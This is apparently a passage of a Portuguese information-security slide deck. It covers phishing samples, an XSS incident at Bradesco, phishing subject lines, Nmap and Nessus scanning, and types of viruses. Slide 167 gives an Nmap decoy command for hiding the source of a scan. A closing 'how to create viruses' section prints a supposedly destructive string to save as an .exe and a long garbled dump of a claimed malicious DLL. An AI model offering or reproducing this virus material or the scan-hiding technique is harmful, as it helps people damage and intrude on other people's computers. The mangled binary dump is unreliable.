    139. 139. Uso de marca popular Distrbuição muito vantajosa de prêmios Pedido de download de arquivo
    140. 140. Uso de marca popular Erro de português Dívida inexistente Falta de menção a endereço por extenso
    141. 141. Erro de português
    142. 142. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Criminosos brasileiros conseguiram descobrir um problema em uma página do Bradesco que permitia que a mesma fosse “alterada” por meio de links, possibilitando o uso do domínio do banco para todo tipo de atividade maliciosa. Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma página localizada em institucional.bradesco.com.br. Se clicado, o link enviava informações à página que causavam um comportamento indesejável, fazendo com que argumentos da query string — como é chamada a parte do link depois do ponto de interrogação (”asp?…”) — fossem inseridas como código, permitindo o ataque. Dias antes da publicação desta matéria, a Linha Defensiva notificou o Bradesco. O banco removeu a página vulnerável dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das “chaves de segurança” usadas nas transações através da Internet, convidando o usuário a fazê-lo por meio do link. 142
    143. 143. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Como é demonstrado na imagem, a maioria dos navegadores e os programas de e-mails não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo que a existência do golpe seja percebida. Embora o e-mail tenha usado uma técnica refinada que facilmente poderia enganar até mesmo usuários com certa experiência, devido ao link camuflado, erros de ortografia característicos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail em massa usado pelos criminosos não era compatível com caracteres especiais, como acentos. 143
    144. 144. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) XSS Cross Site Scripting, ou XSS, é um tipo de vulnerabilidade onde determinada página de internet não filtra suficientemente as informações enviadas pelo navegador web, sendo possível fazê-la exibir conteúdos de outros sites, ou conteúdos especificados no próprio link ou outra informação. Um exemplo clássico é a página de busca. Em geral, páginas de buscas exibem na tela a informação que está sendo procurada (por exemplo, “Você está procurando por: [termo de pesquisa]“). Se a exibição desta informação não for filtrada corretamente, a informação, em vez de exibida, será interpretada como código HTML pelo navegador, possibilitando o ataque. Fóruns, livros de visitas e blogs (este último, devido à função de comentários) podem ser vítimas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetará qualquer usuário que o ver. Este é o ataque de XSS persistente, ou tipo 2. O Bradesco foi alvo do XSS impermanente ou não-persistente, também chamado de XSS tipo 1. O objetivo de ataques XSS é geralmente roubar informações importantes da vítima, tais como os cookies de autenticação. Porém, XSS também pode ser usado para alterar os sites e usar da confiança depositada pelo internauta na página para persuadi-lo a enviar informações sigilosas, ou para rodar código malicioso nos PCs de visitantes. A Linha Defensiva já noticiou a respeito de brechas semelhantes no YouTube e no Orkut. Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail 144 e similares não sejam clicados, a não ser quando estava-se esperando absolutamente o e-mail em questão (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possível, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o que foi indicado no e-mail. Brechas de XSS tipo 2 são difíceis de serem evitadas pelo usuário, sendo a responsabilidade do site nesses casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.
    145. 145. Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa- inst-xss/) Ao acessar o link, o internauta era direcionado para uma página do Bradesco (Index_Pesquisa.asp) que, vulnerável a XSS, carregava outra página, hospedada em um domínio brasileiro (cujo nome não foi divulgado por se tratar de um domínio legítimo comprometido). Em ataques XSS, páginas legítimas são usadas de forma maliciosa e um código (no caso acima, um FRAMESET1) é inserido na página legítima. O conteúdo da página será, portanto, diferente do esperado. 145
    146. 146. Lista de Hackers fornecida: ¨ Amores On-line - cartão virtual - Equipe Carteiro Romântico - Uma pessoa que lhe admira enviou um cartão ¨ As fotos que eu tinha prometido. Álbum pessoal de fotos ¨ AVG Antivírus - Detectamos que seu E.Mail está enviando mensagens contaminadas com o vírus w32. bugbear ¨ Aviso - você está sendo traído - veja as fotos ¨ Aviso - você está sendo traído - veja as imagens do motel ¨ Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados - Contrato Pendente - Clique para fazer atualização ¨ Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoções exclusivas? Clique na fechadura ¨ Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao Crédito - Notificação - Pendências Financeiras - Baixar o arquivo de relatório de pendências. ¨ carnaval 2005 - veja o que rolou nos bastidores do carnaval de São Paulo ¨ Cartão Terra - eu te amo - webcard enviado através do site Cartões Terra ¨ Cartão UOL - I love you - você recebeu um cartão musical - Para visualizar e ouvir escolha uma das imagens ¨ Cartões BOL - Você recebeu um cartão BOL ¨ Cartõesnico.com - Seu amor criou um cartão para você ¨ Checkline - Consultas de crédito on-line - Consultas no Serasa/SPC ¨ Claro Idéias - Grande chance de ganhar meio milhão de reais em ouro e 18 carros ¨ Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e equipamentos em urgência
    147. 147. Lista de Hackers fornecida: ¨ Correio Virtual - hi5 - Seu Amor te enviou este cartão ¨ CPF cancelado ou pendente de regularização - verifique; seu CPF está cancelado ¨ Declaração de Imposto de Renda de 2005/06 - Ministério da Fazenda - CPF Cancelado ou Pendente de Regularização ¨ Ebay - your account could be suspended - Billing Department ¨ Embratel - Comunicado de Cobrança - Aviso de Bloqueio ¨ Embratel - Notificação Confidencial - Fatura de serviços prestados Clique para detalhamento da fatura ¨ Emotion Cards - UOL - Parabéns você recebeu um Presente Virtual ¨ Febraban - Guia de Segurança - Febrasoft Security ¨ Finasa - Nossa Caixa - Fraudes Bancárias - Febraban ¨ Fininvest - débito em atraso - pendências financeiras em seu CPF/CNPJ ¨ Ganhe uma viagem a Paris - Guia Paris Lumiére ¨ Gmail - Gmail Amigo Oculto - Baixar Formulário - E-mail de 1 Giga ¨ Humortadela - Piada animada sempre amigos ¨ Humortadela - você é 10 - acesse o link e sacaneie ¨ Humortadela - você recebeu uma piada animada - Ver Piada Animada ¨ Ibest - acesso grátis e fácil - discador ibest - 0800 conexão sem pulso telefônico. Grátis - Download ¨ Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vídeo ¨ Leiam esta informação IMPORTANTe ¨ Martins Com Ltda - Setor de Compras - Orçamento ¨ Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento não for quitado acionaremos departamento jurídico
    148. 148. Lista de Hackers fornecida: ¨ Olá, há quanto tempo! Eu me mudei para os Estados Unidos, e perdemos contato... ¨ Olha o que a Globo preparou para você neste ano de 2005 - Big Brother Brasil 5 - Baixe o vídeo ¨ Overture - Promoção para novos assinantes - Tem cliente procurando, tem você oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar ¨ Paparazzo - globo. com - se você gostou de uma espiada no vídeo ¨ Parperfeito - Você foi adicionado aos prediletos - Associado do Par Perfeito ¨ Passe Livre de 7 dias no Globo Media Center ¨ Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra ¨ Radio Terra - dedique uma música ¨ Receita Federal - CPF cancelado ou pendente de regularização ¨ Saudades de você - Sou alguém que te conheceu há muito tempo, e tive que fazer uma viagem - Espero que goste das fotos ¨ SERASA - pendências referentes a seu nome - Extrato de débito ¨ SERASA - Regularize seu CPF ou CNPJ - clique para extrato de débitos ¨ Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mão ¨ Sou um amigo seu - você está sendo traído - veja as fotos ¨ Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença para 1 ano grátis ¨ Terra Cartões - O meu melhor presente é você ¨ Tim pós pago - pendências no SPC - Sistema de Proteção aoCrédito - Serial do Celular
    149. 149. Lista de Hackers fornecida: ¨ Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do Microsoft Windows - Windows XP fica a cara de quem recebe um cartão Voxcards ¨ Microsoft Software - Este conteúdo foi testado e é fornecido a você pela Microsoft Corporation - Veja as novidades ¨ Music Cards - Confirmação ¨ Necktsun Comércio Ltda - Palmas - Departamento de Vendas - Orçamento ¨ Netcard Cartões Virtuais - Emoções de verdade ¨ Norton Antivírus - Alerta de Segurança - download do antídoto para o Ms. Bruner ¨ Notificação Confidencial - Pendências Financeiras em seu CPF ¨ O carteiro - você recebeu um cartão de quem te admira ¨ O carteiro. com - tenho uma novidade para você - veja o cartão que preparei ¨ Voxcards - cartão voxcards - para quem você vai mandar um cartão hoje? ¨ Voxcards - mensageiro - você está recebendo um cartão virtual voxcards - Precisa instalar o plugin - clique para instalar ¨ Webcard Terra - Feliz Dia das Mães - Existe um presente especial esperando por você no site de cartões do terra. ¨ Week - Complimentary Subscription Confirmation - Free - Please Apply online - PC Week ¨ www. symantec. com - A solução Antivírus mais confiável do mundo ¨ www.microsoft. com - Proteja seu computador com antivírus
    150. 150. Lista de Hackers fornecida: ¨ UOL - Promoção Cultural - Cara cadê meu carro ¨ UOL Cartões - Estou com saudades - clique para visualizar ¨ UOL Cartões - Seu amor lhe enviou um cartão - clique para baixar ¨ UOL Cartões - Você recebeu um lindo cartão virtual ¨ Veja as fotos proibidas das musas do bbb5 ¨ Viagens contaminadas com o w32. bugbear ¨ Virtual Cards - Um grande abraço da equipe virtual cards - ler cartão ¨ VIVO - Torpedos Web Gratuito - Torpedo Fácil Vivo ¨ Yahoo Cartões - Você é tudo para mim - clique na imagem ¨ Yahoo Cartões - Você é tudo para mim - enviado por quem te admira ¨ Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! ¨ Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc... ¨ E, finalmente, para ter certeza que é de um golpe que você está sendo vítima, passe o mouse - sem clicar - pela palavra do direcionamento : você vai ver, na barra inferior - à esquerda da tela -, que se trata de um arquivo com a terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vão) espionar seu computador, roubando seus dados, senhas, etc.
    151. 151. Symantec: relatório mapeia mercado negro de dados ¨ Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O relatório traz o preço das informações negociadas por criminosos e mostra como as empresas podem ter prejuízos com a vulnerabilidade dos dados dos clientes. Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, já existe um ecossistema criado em torno do roubo de dados. “Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe é um grande mercado”, afirma o executivo. Veja tabela com o preço dos dados no mercado negro: ¨ Produto Preço Contas bancárias de 10 dólares a mil dólares Cartões de crédito de 0,40 dólar a 20 dólares Identidades completas de 1 dólar a 15 dólares Contas do eBay de 1 dólar a 18 dólares Senhas de e-mail de 4 dólares a 30 dólares Proxies de 1,5 dólar a 30 dólares CW Connect - No grupo de discussão sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informação e telecomunicações do mercado, uma das participantes - a analista Fabiana - inseriu uma pesquisa sobre as principais ameaças às informações da empresa: ¨ 1 - Vírus 75% (Por falta de conhecimento os usuários baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgação de senhas 57% 3 - Hackers 44% 4 - Funcionários insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informações 33%
    152. 152. 152
    153. 153. Técnicas para Alcançar os Objetivos da Segurança ¨Deve-se perguntar: 153 – Proteger O QUÊ? – Proteger DE QUEM? – Proteger A QUE CUSTOS? – Proteger COM QUE RISCOS? ¨O axioma da segurança é bastante conhecido de todos, mas é verdadeiro: – "Uma corrente não é mais forte do que o seu elo mais fraco"
    154. 154. 154 Custo de Segurança:
    155. 155. 155 Custo Visiveis x Invisiveis:
    156. 156. AA mmaaiioorriiaa ddooss aattaaqquueess aaccoonntteeccee aaqquuii PPrroodduuttoo LLaannççaaddoo VVuullnneerraabbiilliiddaaddee ddeessccoobbeerrttaa FFiixx ddiissppoonníívveell FFiixx iinnssttaallaaddoo ppeelloo cclliieennttee Atualização do ambiente Quando as ameaças ocorrem?
    157. 157. Atualização do ambiente Tempo para a invasão diminuindo PPrroodduuttoo LLaannççaaddoo Invasão O tempo (em dias) entre a disponibilização VVuullnneerraabbiilliiddaaddee ddeessccoobbeerrttaa da correção e a FFiixx ddiissppoonníívveell FFiixx iinnssttaallaaddoo ppeelloo cclliieennttee invasão tem diminuído, portanto a aplicação de “patches” não pode ser a única defesa em grandes empresas 18 151 0 331 BBllaassttee rr WWeellcchhii aa// NNaacchhii NNiimmdd aa 25 SSQQLL SSllaammmm eerr 14 SSaasssseerr
    158. 158. Atualização do ambiente Worm Zotob ¨ 09/08 - A Microsoft publica a correção ¨ 11/08 - A Microsoft informa que um ataque está na eminencia de acontecer sobre essa vulnerabilidade ¨ 17/08 - CNN e ABC são atacadas
    159. 159. Principais Ameaças 9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
    160. 160. Principais Obstáculos 9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security
    161. 161. Análise de Segurança 161 ¨ São falhas em serviços, aplicativos e sistemas operacionais que pode acarretar acesso ao sistemas parcial ou total em nível de administração. ¨ Hoje temos ferramentas de escaneamento de vulnerabilidades que detecta falhas de sistemas, mais também são utilizadas para invasão. ¨ Segundo o site sectools.org temos as 10 principais ferramentas de escaneamento de vulnerabilidades de sistemas. – Nessus, GFI LANguard, Retina, Core Impact, ISS Internet Scanner, X-scan, Sara, QualysGuard, SAINT, MBSA
    162. 162. 162 Soluções para a Insegurança Informática ¨NMAP - É uma ferramenta para exploração de rede criada pelo Fyodor. É uma das ferramentas mais importantes para engenharia de segurança ou pen-tester. Com ele você poderá entrar em uma rede e buscar serviços que estão escutando em cada porta especifica. Você pode fazer um varredura de tcp()connect que fará uma conexão completa com o host ou uma syn scan que fará uma simples conexão que servirá para testar regras de firewall por exemplo.
    163. 163. 163 Soluções para a Insegurança Informática ¨NMAP (I) Alvo: MS-Windows 95 modificado
    164. 164. 164 Soluções para a Insegurança Informática ¨NMAP (II) Alvo: Linux Mandrake modificado
    165. 165. 165 Soluções para a Insegurança Informática ¨NMAP (comandos) Um rastreio(scan) típico do Nmap é mostrado em Example 1, “Uma amostra de rastreio(scan) do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A para permitir a detecção de SO e a versão -T4 para execução mais rápida e os nomes de anfitrião(hostnames) de dois alvos.
    166. 166. 166 Soluções para a Insegurança Informática ¨NMAP (comandos - Ubuntu) Version detection: Após as portas TCP e/ou UDP serem descobertas por algum dos métodos, o nmap irá determinar qual o serviço está rodando atualmente. O arquivo nmap-service- probes é utilizado para determinar tipos de protocolos, nome da aplicação, número da versão e outros detalhes
    167. 167. 167 Soluções para a Insegurança Informática ¨NMAP (comandos - Ubuntu) D <decoy1,[decoy2],[SEU_IP]...> Durante uma varredura, utiliza uma série de endereços falsificados, simulando que o scanning tenha originado desses vários hosts, sendo praticamente impossível identificar a verdadeira origem da varredura. sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP 192.168.0.1
    168. 168. 168 Soluções para a Insegurança Informática ¨ Análise de Segurança – Método de detecção remota de vulnerabilidades • Aplicações como o NMAP não tiram conclusões • Existe outro tipo de aplicação que efectua o levantamento remoto de recursos, detecta vulnerabilidades, alerta o utilizador ou lança ataques – NESSUS (Nessus Security Scanner) • É uma ferramenta sofisticada que funciona de forma semi-automática • Pode ser usada para obter relatórios de segurança informática • Também pode ser utilizada para “atacar “ uma plataforma • Incorpora ataques de negação de serviço, teste de exploits, etc • Facilita muito a actividade dos crackers
    169. 169. 169 Soluções para a Insegurança Informática ¨NESSUS - Até há pouco tempo o Nessus só funcionava no Linux, mas recentemente foi lançado o Nessus para Windows. É uma excelente ferramenta designada para testar e descobrir falhas de segurança (portas, vulnerabilidades, exploits) de uma ou mais máquinas. - Estas falhas ou problemas podem ser descobertos por um grupo hacker, um único hacker, uma empresa de segurança ou pelo próprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que alguém tire vantagem destes com propósitos maliciosos.
    170. 170. 170 Soluções para a Insegurança Informática ¨NESSUS Alvo: Linux SuSE Detectando Nmap
    171. 171. 171 Soluções para a Insegurança Informática ¨NESSUS Alvo: MS-Windows 95 Detectando Nmpa
    172. 172. 172 Soluções para a Insegurança Informática ¨NESSUS Alvo: Linux RedHat após instalação
    173. 173. 173 Soluções para a Insegurança Informática ¨NESSUS Verificação da pópria máquina
    174. 174. Soluções para a Insegurança Informática ¨NESSUS - Report
    175. 175. Soluções para a Insegurança Informática ¨NESSUS – Report com formato HTML
    176. 176. VÍRUS
    177. 177. Tipos de Virus ¨ Vírus de Boot Um dos primeiros tipos de vírus conhecido, o vírus de boot infecta a partição de inicialização do sistema operacional. Assim, ele é ativado quando o computador é ligado e o sistema operacional é carregado. ¨ Time Bomb Os vírus do tipo "bomba de tempo" são programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectado um determinado sistema, o vírus somente se tornará ativo e causará algum tipo de dano no dia ou momento previamente definido. Alguns vírus se tornaram famosos, como o "Sexta-Feira 13" e o "Michelangelo". Minhocas, worm ou vermes Com o interesse de fazer um vírus se espalhar da forma mais abrangente possível, seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usuários infectados e passaram a programar seus vírus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus autores visam tornar suas criações mais conhecidas na Internet. Este tipo de vírus passou a ser chamada de verme ou worm. Eles estão mais aperfeiçoados, já há uma versão que ao atacar a máquina hospedeira, não só se replica, mas também se propaga pela internet pelos e-mail que estão registrados no cliente de e-mail, infectando as máquinas que abrirem aquele e-mail, reiniciando o ciclo
    178. 178. Tipos de Virus (cont) ¨ Trojans ou cavalos de Tróia Certos vírus trazem em seu bojo um código a parte, que permite a um estranho acessar o micro infectado ou coletar dados e enviá-los pela Internet para um desconhecido, sem notificar o usuário. Estes códigos são denominados de Trojans ou cavalos de Tróia. Inicialmente, os cavalos de Tróia permitiam que o micro infectado pudesse receber comandos externos, sem o conhecimento do usuário. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema. Atualmente os cavalos de Tróia agora procuram roubar dados confidenciais do usuário, como senhas bancárias. Os vírus eram no passado, os maiores responsáveis pela instalação dos cavalos de Tróia, como parte de sua ação, pois eles não têm a capacidade de se replicar. Atualmente, os cavalos de Tróia não mais chegam exclusivamente transportados por vírus, agora são instalados quando o usuário baixa um arquivo da Internet e o executa. Prática eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usuários. Tais e-mails contém um endereço na Web para a vítima baixar o cavalo de Tróia, ao invés do arquivo que a mensagem diz ser. Esta prática se denomina phishing,expressão derivada do verbo to fish, "pescar" em inglês. Atualmente, a maioria dos cavalos de Tróia visam sites bancários, "pescando" a senha digitada pelos usuários dos micros infectados. Há também cavalos de Tróia que ao serem baixados da internet "guardados" em falsos programas ou em anexos de e-mail, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt dá as "regras do jogo": os dados foram "seqüestrados" e só serão "libertados" mediante pagamento em dinheiro para uma determinada conta bancária, quando será fornecido o código restaurador. Também os cavalos de tróia podem ser usados para levar o usuário para sites falsos, onde sem seu conhecimento, serão baixados trojans para fins criminosos, como aconteceu com os links do google, pois uma falha de segurança poderia levar um usuário para uma página falsa. Por este motivo o serviço esteve fora do ar por algumas horas para corrigir esse bug, pois caso contrário as pessoas que não distinguissem o site original do falsificado seriam afetadas. ¨ Hijackers Hijackers são programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet Explorer. Quando isso ocorre, o hijacker altera a página inicial do browser e impede o usuário de mudá-la, exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem impedir acesso a determinados sites (como sites de software antivírus, por exemplo).
    179. 179. Tipos de Virus (cont) ¨ Vírus no Orkut Em torno de 2006 e 2007 houve muitas ocorrências de vírus no Orkut que é capaz de enviar scraps (recados) automaticamente para todos os contatos da vítima na rede social, além de roubar senhas e contas bancárias de um micro infectado através da captura de teclas e cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se infectar, a relação de confiança existente entre os amigos aumenta muito a possibilidade de o usuário clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um arquivo bem pequeno é baixado para o computador do usuário. Ele se encarrega de baixar e instalar o restante das partes da praga, que enviará a mensagem para todos os contatos do Orkut. Além de simplesmente se espalhar usando a rede do Orkut, o vírus também rouba senhas de banco, em outras palavras, é um clássico Banker. ¨ Keylogger O KeyLogger é uma das espécies de vírus existentes, o significado dos termos em inglês que mais se encaixa no contexto seria: Capturador de teclas . Ao serem executados, normalmente os keyloggers ficam escondidos no sistema operacional, sendo assim a vítima não tem como saber que está sendo monitorada. Atualmente os keyloggers são desenvolvidos para meios ilícitos, como por exemplo roubo de senhas bancárias. São utilizados também por usuários com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vítima, sendo assim, quem implantou o keylogger tem controle sobre o que a pessoa está fazendo no computador. ¨ Estado Zumbi O estado zumbi em um computador ocorre quando é infectado e está sendo controlado por terceiros. Podem usá-lo para disseminar, vírus , keyloggers, e procededimentos invasivos em geral. Usualmente esta situação ocorre pelo fato da máquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na área, um computador que está na internet nessas condições tem quase 50% de chance de se tornar uma máquina zumbi, que dependendo de quem está controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers são presos por formar exércitos zumbis para roubar dinheiro das contas correntes e extorquir.
    180. 180. Tipos de Virus (cont) ¨ Vírus de E-mail Até pouco tempo atrás não existiam vírus de E-mail e todos os textos que circulavam sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e não necessitam que se execute qualquer programa anexado ou não a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia. KakWorm : Só ataca as versões inglesa e francesa do Outlook. Para que a contaminação aconteça basta que uma mensagem contaminada seja exibida no “painel de visualização”, sem necessidade de abrir o mail. Além de sua autopropagação, o principal efeito consiste no desligamento do computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as mensagens levarão consigo o KakWorm. Todo primeiro dia do mês, às17hs, é apresentada a mensagem: “Kagou-Anti-Kro$oft says not today!”. Em seguida, o computador é desligado. Romeu e Julieta : Ataca os computadores que usam as versões 4.0, 4.01, 5.0, e 5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma característica desse worm é que o assunto (subject) da mensagem que contém o vírus varia e é selecionado aleatoriamente entre os seguintes: Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - lol :) - ,,,… - !!! - newborn - merry christmas! - surprise ! - Caution: NEW VIRUS ! - scandal ! - ^_^ - Re: - Romeo&Juliet - <> :)))))) - hello world - !!??!?!? - subject - ble bla, bee - I Love You ;) - sorry… - Hey you ! - Matrix has you… - my picture from shake-beer Davinia: É capaz de contaminar e de autopropagar-se sem a existência de um arquivo anexado à mensagem, danifica todos os arquivos .html e os deixa irrecuperáveis.
    181. 181. Tipos de Virus (cont) ¨ Vírus de macro Quando se usa alguns programas, por exemplo um editor de texto, e necessita-se executar uma tarefa repetidas vezes em seqüência (por exemplo substituir todos os “eh” por “é”) pode-se editar um comando único para efetuá-las. Esse comando é chamado de macro, que pode ser salvo em um modelo para ser aplicado em outros arquivos. Além dessa opção da própria pessoa fazer um modelo os comandos básicos dos editores de texto também funcionam com modelos. Os vírus de macro atacam justamente esses arquivos comprometendo o funcionamento do programa. Os alvos principais são os próprios editores de texto (Word) e as planilhas de cálculo (Excel). A disseminação desse tipo de vírus é muito mais acentuada pois documentos são muito móveis e passam de máquina em máquina . Ao escrever, editar ou, simplesmente, ler arquivos vindos de computadores infectados a contaminação ocorre. Assim, verdadeiras “epidemias” podem acontecer em pouco tempo. Além disso, os macrovírus constituem a primeira categoria de vírus multiplataforma, ou seja, não se limitam aos computadores pessoais, podendo infectar também outras plataformas que usem o mesmo programa, como o Macintosh, por exemplo.
    182. 182. Phishing scam ¨ Bastante comum, esse tipo de golpe virtual é baseado no envio de e-mails sugerindo que os internautas baixem arquivos ou visitem sites maliciosos. Outra possibilidade para enganar os usuários da web é a oferta de links, também para páginas fraudulentas, em variados sites, blogs e redes sociais. Quando aceitam a sugestão dos piratas, abrindo os arquivos ou visitando esses endereços, as vítimas em potencial podem infectar seus computadores involuntariamente com programas maliciosos. Geralmente, essas pragas instaladas na máquina têm como objetivo roubar informações pessoais dos usuários de internet. 182
    183. 183. Phishing scam 183
    184. 184. 184
    185. 185. O que significa SPAM ¨ O termo SPAM origina-se de um programa de série inglesa de comédia onde os clientes pediam repetidamente “SPAM”, marca de um presunto enlatado americano. ¨ Na informática significa enviar mensagens para qualquer quantidade de usuários, sem obter prévia autorização.
    186. 186. Como Evitar SPAM ¨ Existem diversas formas de bloqueio de mensagens não solicitadas. Vários programas fazem esse serviço, como por exemplo, o SPAM Assassin. São configurados para bloquear as mensagens vindas de endereços conhecidos que disseminam essas mensagens. Bloqueia-se também as mensagens contendo alguma palavra ou expressão específica, por exemplo: ¨ “Compre um notebook” ¨ “Troque seus cartuchos de impressoras” ¨ “Free teen images”
    187. 187. ataque-servidor 6% ataque-usuario 4% axfr 32% spam 24% scan 30% dos 1% fraude invasao 0% 3%
    188. 188. 188 Posso enviar um vírus por brincadeira? Não! Mesmo por brincadeira, enviar um vírus de computador pode configurar crime de dano. Certifique-se que os anexos transmitidos são arquivos benignos e úteis ao destinatário. Código Penal Dano Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia: Pena - detenção, de um a seis meses, ou multa. Um vírus pode se propagar de diversas formas.  anexo  download  engenharia social
    189. 189. Possíveis danos ¨ Perda de desempenho do micro; ¨ Exclusão de arquivos; ¨ Alteração de dados; ¨ Acesso a informações confidenciais por pessoas não autorizadas; ¨ Perda de desempenho da rede (local e Internet); ¨ Monitoramento de utilização (espiões); ¨ Desconfiguração do Sistema Operacional. ¨ Inutilizarão de determinadas peças.
    190. 190. 190 Detectando, prevenindo e combatendo os vírus
    191. 191. 191 E os anti-vírus são…
    192. 192. Anti virus em ação
    193. 193. Anti Spywere em ação
    194. 194. Como Criar Virus 194
    195. 195. Código de Vírus ¨ Teste X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD- 195 ANTIVIRUS-TEST-FILE!$H+H* ¨ Malicioso (Salvar no Bloco de Nota Vassoura.exe) AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE... AIL.COM/AMDWIN@*.*
    196. 196. Código de Vírus (cont) ¨ Ctfmon32.dll Virus Perigoso – Não sai do computador: MZ ÿÿ @ @ º ´ Í!¸LÍ!This program € € cannot be run in DOS mode. 196 $ PE L ÎýwE à ! A ” @ P êâ @ N 0 @@ .data l @ Ð.text m à.idata 0 @ À.edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL ÿÿÿÿÿÿÿÿU‰å‹E ƒøu(‹E£ @ è# ¡@ Àt ÿ5 @ è ¸ ëƒø u è— ¸ ë1ÀÉ U‰åƒìVuøVjh @ ÿ5 @ jÿÿz0@ h‚ @ ÿ‚0@ h @ Pÿ†0@ £ @ ÿuÿuÿuÿuÿu ÿuÿ @ ‰EüVjh @ ÿ5 @ jÿÿz0@ ^‹EüÉ U ‰åƒìVuøVjh2 @ ÿ5. @ jÿÿz0@ h‚ @ ÿ‚0@ hD @ Pÿ†0@ £@ @ ÿuÿuÿuÿuÿu ÿuÿ@ @ ‰EüVjh: @ ÿ5. @ jÿÿz0@ ^‹EüÉ U ‰åƒìVWÿuÿuÿuÿuÿu ÿuèlÿÿÿ‰Eì À…0 ‹}‹Eƒø uG‰Eð‹w ÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèÏ Àu&‹E £ @ @ÿuÿuÿuÿuPÿuèÕþÿÿ‰Eìéoe ÿuÿuÿuÿuÿ5 @ ÿuè³þÿÿ‰Eì Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèO Àu(¡ @ ;E s‹E @ÿuÿuÿuÿuPÿuèPþÿÿ‰Eìëÿuÿuÿuÿuÿu ÿuè4þÿÿ‰Eì_^‹EìÉ U‰åƒìVWÇEüÿÿÿÿ‹M ‹}¾@ üóf§ ÉuÇEü _^‹EüÉ U‰åƒìVuøVjhW @ ÿ5S @ jÿÿz0@ h‚ @ ÿ‚0@ hi @ Pÿ†0@ £e @ ÿuÿuÿu ÿuÿe @ ‰EüVjh_ @ ÿ5S @ jÿÿz0@ ^‹EüÉ U ‰åƒìVWÿuÿuÿuÿuÿu ÿuèóüÿÿ‰Eì À…0 ‹}‹Eƒø uG ‰Eð‹wÇEø ÇEü ë ƒø… G‰Eð‹wÇEø ÇEü h@ ÿ’0@ ¹ ÷á9Æu:¹ ÷ñPÿuðèËþÿÿ Àu&‹E £OE @ @ÿuÿuÿuÿuPÿuèüÿÿ‰Eìéoe ÿuÿuÿuÿuÿ5OE @ ÿuè:üÿÿ‰Eì Àua‹Eø‰Eð‹Eü‹4h@ ÿ’0@ ¹ ÷á9Æu<¹ ÷ñPÿuðèKþÿÿ Àu(¡OE @ ;E s‹E 